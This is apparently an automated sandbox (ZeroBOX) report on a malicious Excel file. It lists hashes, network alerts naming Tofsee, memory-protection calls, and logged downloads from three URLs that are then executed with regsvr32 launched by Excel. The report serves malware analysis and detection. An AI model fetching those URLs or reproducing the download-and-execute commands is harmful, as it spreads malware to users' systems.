Summary | ZeroBOX

chart-1352129573.xls

MSOffice File
Category FILE
Machine s1_win7_x6403_us
Started Sept. 25, 2021, 5 p.m.
Completed Sept. 25, 2021, 5:02 p.m.
Size 245.5KB
Type Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1251, Last Saved By: Vdgtjghk, Name of Creating Application: Microsoft Excel, Create Time/Date: Fri Jun 5 18:19:34 2015, Last Saved Time/Date: Fri Sep 24 09:37:12 2021, Security: 0
MD5 3b0372de1f2116a802bc35e1000841d6
SHA256 1d9b090fc4be999d9d3043a19bbf6c6d1f1d740d5d6253cd618bb9462d5cc2e2
CRC32 F03BA3BD
ssdeep 6144:mKpb8rGYrMPe3q7Q0XV5xtuEsi8/dg79nWXcZZVtjKFOTDwvO0PDUlQvS32no7X1:79ndjjKoTDwvbDS3fLvfH1GOP
Yara
  • Microsoft_Office_File_Zero - Microsoft Office File

IP Address Status Action
164.124.101.2 Active Moloch
192.124.249.84 Active Moloch
210.245.90.247 Active Moloch

Suricata Alerts

Flow SID Signature Category
TCP 192.168.56.103:49168 -> 192.124.249.84:443 906200056 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49174 -> 210.245.90.247:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.103:49172 -> 210.245.90.247:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.103:49174 -> 210.245.90.247:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.103:49172 -> 210.245.90.247:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.103:49172 -> 210.245.90.247:443 906200056 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 210.245.90.247:443 -> 192.168.56.103:49172 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 210.245.90.247:443 -> 192.168.56.103:49172 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.124.249.84:443 -> 192.168.56.103:49170 2029340 ET INFO TLS Handshake Failure Potentially Bad Traffic
TCP 192.168.56.103:49169 -> 192.124.249.84:443 906200056 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49173 -> 210.245.90.247:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.103:49173 -> 210.245.90.247:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.103:49173 -> 210.245.90.247:443 906200056 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 210.245.90.247:443 -> 192.168.56.103:49173 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 210.245.90.247:443 -> 192.168.56.103:49173 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 210.245.90.247:443 -> 192.168.56.103:49174 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 210.245.90.247:443 -> 192.168.56.103:49174 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode

Suricata TLS

No Suricata TLS

Time & API Arguments Status Return Repeated

NtProtectVirtualMemory

process_identifier: 2516
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6bf98000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2516
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6b0f2000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2816
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6c471000
process_handle: 0xffffffff
1 0 0
cmdline regsvr32 C:\Datop\test.test
cmdline "C:\Windows\System32\regsvr32.exe" C:\Datop\test2.test
cmdline "C:\Windows\System32\regsvr32.exe" C:\Datop\test1.test
cmdline "C:\Windows\System32\regsvr32.exe" C:\Datop\test.test
cmdline regsvr32 C:\Datop\test1.test
cmdline regsvr32 C:\Datop\test2.test
Time & API Arguments Status Return Repeated

NtProtectVirtualMemory

process_identifier: 2516
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 32 (PAGE_EXECUTE_READ)
base_address: 0x7ef70000
process_handle: 0xffffffff
1 0 0
Time & API Arguments Status Return Repeated

URLDownloadToFileW

url: https://finejewels.com.au/w3wU4YqfP/say.html
stack_pivoted: 0
filepath_r: C:\Datop\test.test
filepath: C:\Datop\test.test
2148270085 0

URLDownloadToFileW

url: https://thietbiagt.com/1OLxyr4H/say.html
stack_pivoted: 0
filepath_r: C:\Datop\test1.test
filepath: C:\Datop\test1.test
2148270085 0

URLDownloadToFileW

url: https://new.americold.com/4Tn6Vu2ML/say.html
stack_pivoted: 0
filepath_r: C:\Datop\test2.test
filepath: C:\Datop\test2.test
2148270085 0
parent_process excel.exe martian_process regsvr32 C:\Datop\test.test
parent_process excel.exe martian_process "C:\Windows\System32\regsvr32.exe" C:\Datop\test2.test
parent_process excel.exe martian_process "C:\Windows\System32\regsvr32.exe" C:\Datop\test1.test
parent_process excel.exe martian_process "C:\Windows\System32\regsvr32.exe" C:\Datop\test.test
parent_process excel.exe martian_process regsvr32 C:\Datop\test1.test
parent_process excel.exe martian_process regsvr32 C:\Datop\test2.test
file C:\Windows\System32\regsvr32.exe